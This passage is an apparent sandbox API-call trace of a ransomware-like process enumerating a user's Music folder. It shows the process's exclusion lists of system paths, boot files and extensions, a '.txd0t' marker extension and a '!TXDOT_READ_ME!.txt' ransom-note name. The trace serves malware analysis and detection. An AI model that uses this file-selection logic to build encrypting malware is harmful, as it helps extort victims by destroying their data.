returned 0x0 [0074.942] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0074.942] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0074.942] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.949] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.949] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3" [0074.949] SetEvent (hEvent=0x3fc) returned 1 [0074.949] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900a9540, ftCreationTime.dwHighDateTime=0x1d5f045, ftLastAccessTime.dwLowDateTime=0x2c28c420, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x2c28c420, ftLastWriteTime.dwHighDateTime=0x1d5e67c, nFileSizeHigh=0x0, nFileSizeLow=0x7c45, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="U7kcA.mp3", cAlternateFileName="")) returned 0 [0074.950] FindClose (in: hFindFile=0xec22b0 | out: hFindFile=0xec22b0) returned 1 [0074.950] GetProcessHeap () returned 0xe30000 [0074.950] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed31f0 | out: hHeap=0xe30000) returned 1 [0074.950] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43d9ce90, ftCreationTime.dwHighDateTime=0x1d5e6e3, ftLastAccessTime.dwLowDateTime=0x9fad7510, ftLastAccessTime.dwHighDateTime=0x1d5e57f, ftLastWriteTime.dwLowDateTime=0x9fad7510, ftLastWriteTime.dwHighDateTime=0x1d5e57f, nFileSizeHigh=0x0, nFileSizeLow=0xa57f, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="m-T19pWPhwjALOHNq.wav", cAlternateFileName="M-T19P~1.WAV")) returned 1 [0074.950] StrCmpW (psz1="m-T19pWPhwjALOHNq.wav", psz2=".") returned 1 [0074.950] StrCmpW (psz1="m-T19pWPhwjALOHNq.wav", psz2="..") returned 1 [0074.950] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0074.950] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0074.950] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="m-T19pWPhwjALOHNq.wav", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav") returned="C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav" [0074.950] PathFindExtensionW (pszPath="m-T19pWPhwjALOHNq.wav") returned=".wav" [0074.950] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0074.950] StrCmpIW (psz1="m-T19pWPhwjALOHNq.wav", psz2="bootsect.bak") returned 1 [0074.950] StrCmpIW (psz1="m-T19pWPhwjALOHNq.wav", psz2="iconcache.db") returned 1 [0074.950] StrCmpIW (psz1="m-T19pWPhwjALOHNq.wav", psz2="thumbs.db") returned -1 [0074.950] StrCmpIW (psz1="m-T19pWPhwjALOHNq.wav", psz2=" ransomware ") returned 1 [0074.950] StrCmpIW (psz1="m-T19pWPhwjALOHNq.wav", psz2=" ransom ") returned 1 [0074.950] StrCmpIW (psz1="m-T19pWPhwjALOHNq.wav", psz2="debug.txt") returned 1 [0074.950] StrCmpIW (psz1="m-T19pWPhwjALOHNq.wav", psz2="boot.ini") returned 1 [0074.950] StrCmpIW (psz1="m-T19pWPhwjALOHNq.wav", psz2="desktop.ini") returned 1 [0074.950] StrCmpIW (psz1="m-T19pWPhwjALOHNq.wav", psz2="autorun.inf") returned 1 [0074.950] StrCmpIW (psz1="m-T19pWPhwjALOHNq.wav", psz2="ntuser.dat") returned -1 [0074.950] StrCmpIW (psz1="m-T19pWPhwjALOHNq.wav", psz2="ntldr") returned -1 [0074.950] StrCmpIW (psz1="m-T19pWPhwjALOHNq.wav", psz2="ntdetect.com") returned -1 [0074.950] StrCmpIW (psz1="m-T19pWPhwjALOHNq.wav", psz2="bootfont.bin") returned 1 [0074.950] StrCmpIW (psz1="m-T19pWPhwjALOHNq.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.950] PathFindExtensionW (pszPath="m-T19pWPhwjALOHNq.wav") returned=".wav" [0074.950] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0074.950] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0074.950] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0074.950] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.971] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.971] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav" [0074.971] SetEvent (hEvent=0x3fc) returned 1 [0074.971] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e577330, ftCreationTime.dwHighDateTime=0x1d5e38a, ftLastAccessTime.dwLowDateTime=0xa5341420, ftLastAccessTime.dwHighDateTime=0x1d5ecbf, ftLastWriteTime.dwLowDateTime=0xa5341420, ftLastWriteTime.dwHighDateTime=0x1d5ecbf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="rUUROgRx9gfXRUYVye", cAlternateFileName="RUUROG~1")) returned 1 [0074.971] StrCmpW (psz1="rUUROgRx9gfXRUYVye", psz2=".") returned 1 [0074.971] StrCmpW (psz1="rUUROgRx9gfXRUYVye", psz2="..") returned 1 [0074.971] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0074.971] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0074.971] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="rUUROgRx9gfXRUYVye", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0074.971] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\system32\\") returned 0x0 [0074.971] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\syswow64\\") returned 0x0 [0074.971] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\system\\") returned 0x0 [0074.971] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\winsxs\\") returned 0x0 [0074.971] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\appdata\\roaming\\") returned 0x0 [0074.971] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\appdata\\local\\") returned 0x0 [0074.971] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\appdata\\locallow\\") returned 0x0 [0074.971] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\all users\\microsoft\\") returned 0x0 [0074.972] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\inetpub\\logs\\") returned 0x0 [0074.972] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\boot\\") returned 0x0 [0074.972] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\perflogs\\") returned 0x0 [0074.972] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\programdata\\") returned 0x0 [0074.972] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\drivers\\") returned 0x0 [0074.972] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\wsus\\") returned 0x0 [0074.972] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\efstmpwp\\") returned 0x0 [0074.972] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\$recycle.bin\\") returned 0x0 [0074.972] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="crypt_detect") returned 0x0 [0074.972] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="cryptolocker") returned 0x0 [0074.972] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="ransomware") returned 0x0 [0074.972] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="C:\\WINDOWS") returned 0x0 [0074.972] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="C:\\Program Files (x86)") returned 0x0 [0074.972] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="C:\\Program Files") returned 0x0 [0074.972] GetProcessHeap () returned 0xe30000 [0074.972] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d2) returned 0xed31f0 [0074.972] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0074.972] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\*", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\*") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\*" [0074.973] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e577330, ftCreationTime.dwHighDateTime=0x1d5e38a, ftLastAccessTime.dwLowDateTime=0xa5341420, ftLastAccessTime.dwHighDateTime=0x1d5ecbf, ftLastWriteTime.dwLowDateTime=0xa5341420, ftLastWriteTime.dwHighDateTime=0x1d5ecbf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2670 [0074.973] StrCmpW (psz1=".", psz2=".") returned 0 [0074.973] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e577330, ftCreationTime.dwHighDateTime=0x1d5e38a, ftLastAccessTime.dwLowDateTime=0xa5341420, ftLastAccessTime.dwHighDateTime=0x1d5ecbf, ftLastWriteTime.dwLowDateTime=0xa5341420, ftLastWriteTime.dwHighDateTime=0x1d5ecbf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.973] StrCmpW (psz1="..", psz2=".") returned 1 [0074.973] StrCmpW (psz1="..", psz2="..") returned 0 [0074.973] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2570ee90, ftCreationTime.dwHighDateTime=0x1d5e0dd, ftLastAccessTime.dwLowDateTime=0x10ae3e50, ftLastAccessTime.dwHighDateTime=0x1d5ed57, ftLastWriteTime.dwLowDateTime=0x10ae3e50, ftLastWriteTime.dwHighDateTime=0x1d5ed57, nFileSizeHigh=0x0, nFileSizeLow=0x17072, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="ioaNBIFVnbYskp4.wav", cAlternateFileName="IOANBI~1.WAV")) returned 1 [0074.973] StrCmpW (psz1="ioaNBIFVnbYskp4.wav", psz2=".") returned 1 [0074.973] StrCmpW (psz1="ioaNBIFVnbYskp4.wav", psz2="..") returned 1 [0074.973] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0074.973] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0074.973] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="ioaNBIFVnbYskp4.wav", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav" [0074.973] PathFindExtensionW (pszPath="ioaNBIFVnbYskp4.wav") returned=".wav" [0074.973] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0074.973] StrCmpIW (psz1="ioaNBIFVnbYskp4.wav", psz2="bootsect.bak") returned 1 [0074.973] StrCmpIW (psz1="ioaNBIFVnbYskp4.wav", psz2="iconcache.db") returned 1 [0074.973] StrCmpIW (psz1="ioaNBIFVnbYskp4.wav", psz2="thumbs.db") returned -1 [0074.973] StrCmpIW (psz1="ioaNBIFVnbYskp4.wav", psz2=" ransomware ") returned 1 [0074.973] StrCmpIW (psz1="ioaNBIFVnbYskp4.wav", psz2=" ransom ") returned 1 [0074.973] StrCmpIW (psz1="ioaNBIFVnbYskp4.wav", psz2="debug.txt") returned 1 [0074.973] StrCmpIW (psz1="ioaNBIFVnbYskp4.wav", psz2="boot.ini") returned 1 [0074.973] StrCmpIW (psz1="ioaNBIFVnbYskp4.wav", psz2="desktop.ini") returned 1 [0074.973] StrCmpIW (psz1="ioaNBIFVnbYskp4.wav", psz2="autorun.inf") returned 1 [0074.973] StrCmpIW (psz1="ioaNBIFVnbYskp4.wav", psz2="ntuser.dat") returned -1 [0074.973] StrCmpIW (psz1="ioaNBIFVnbYskp4.wav", psz2="ntldr") returned -1 [0074.973] StrCmpIW (psz1="ioaNBIFVnbYskp4.wav", psz2="ntdetect.com") returned -1 [0074.973] StrCmpIW (psz1="ioaNBIFVnbYskp4.wav", psz2="bootfont.bin") returned 1 [0074.973] StrCmpIW (psz1="ioaNBIFVnbYskp4.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.973] PathFindExtensionW (pszPath="ioaNBIFVnbYskp4.wav") returned=".wav" [0074.974] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0074.974] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0074.974] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0074.974] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0074.987] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0074.987] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav" [0074.987] SetEvent (hEvent=0x3fc) returned 1 [0074.987] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c40f90, ftCreationTime.dwHighDateTime=0x1d5e3d2, ftLastAccessTime.dwLowDateTime=0x23cb1ad0, ftLastAccessTime.dwHighDateTime=0x1d5e41f, ftLastWriteTime.dwLowDateTime=0x23cb1ad0, ftLastWriteTime.dwHighDateTime=0x1d5e41f, nFileSizeHigh=0x0, nFileSizeLow=0x484c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Mo9aZN_6Jq9VyBd _y.m4a", cAlternateFileName="MO9AZN~1.M4A")) returned 1 [0074.987] StrCmpW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2=".") returned 1 [0074.987] StrCmpW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2="..") returned 1 [0074.987] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0074.987] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0074.987] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="Mo9aZN_6Jq9VyBd _y.m4a", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a" [0074.987] PathFindExtensionW (pszPath="Mo9aZN_6Jq9VyBd _y.m4a") returned=".m4a" [0074.987] StrCmpW (psz1=".m4a", psz2=".txd0t") returned -1 [0074.987] StrCmpIW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2="bootsect.bak") returned 1 [0074.987] StrCmpIW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2="iconcache.db") returned 1 [0074.987] StrCmpIW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2="thumbs.db") returned -1 [0074.987] StrCmpIW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2=" ransomware ") returned 1 [0074.987] StrCmpIW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2=" ransom ") returned 1 [0074.987] StrCmpIW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2="debug.txt") returned 1 [0074.987] StrCmpIW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2="boot.ini") returned 1 [0074.987] StrCmpIW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2="desktop.ini") returned 1 [0074.987] StrCmpIW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2="autorun.inf") returned 1 [0074.987] StrCmpIW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2="ntuser.dat") returned -1 [0074.987] StrCmpIW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2="ntldr") returned -1 [0074.987] StrCmpIW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2="ntdetect.com") returned -1 [0074.987] StrCmpIW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2="bootfont.bin") returned 1 [0074.987] StrCmpIW (psz1="Mo9aZN_6Jq9VyBd _y.m4a", psz2="!TXDOT_READ_ME!.txt") returned 1 [0074.987] PathFindExtensionW (pszPath="Mo9aZN_6Jq9VyBd _y.m4a") returned=".m4a" [0074.987] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".m4a") returned 0x0 [0074.988] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0074.988] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0074.988] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0075.003] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.003] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a" [0075.003] SetEvent (hEvent=0x3fc) returned 1 [0075.003] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9605a0, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0xa85145e0, ftLastAccessTime.dwHighDateTime=0x1d5f031, ftLastWriteTime.dwLowDateTime=0xa85145e0, ftLastWriteTime.dwHighDateTime=0x1d5f031, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="VdR6kOMbj3V3xP", cAlternateFileName="VDR6KO~1")) returned 1 [0075.003] StrCmpW (psz1="VdR6kOMbj3V3xP", psz2=".") returned 1 [0075.003] StrCmpW (psz1="VdR6kOMbj3V3xP", psz2="..") returned 1 [0075.003] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0075.003] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0075.003] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="VdR6kOMbj3V3xP", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0075.003] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\system32\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\syswow64\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\system\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\winsxs\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\appdata\\roaming\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\appdata\\local\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\appdata\\locallow\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\all users\\microsoft\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\inetpub\\logs\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\boot\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\perflogs\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\programdata\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\drivers\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\wsus\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\efstmpwp\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch=":\\$recycle.bin\\") returned 0x0 [0075.004] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="crypt_detect") returned 0x0 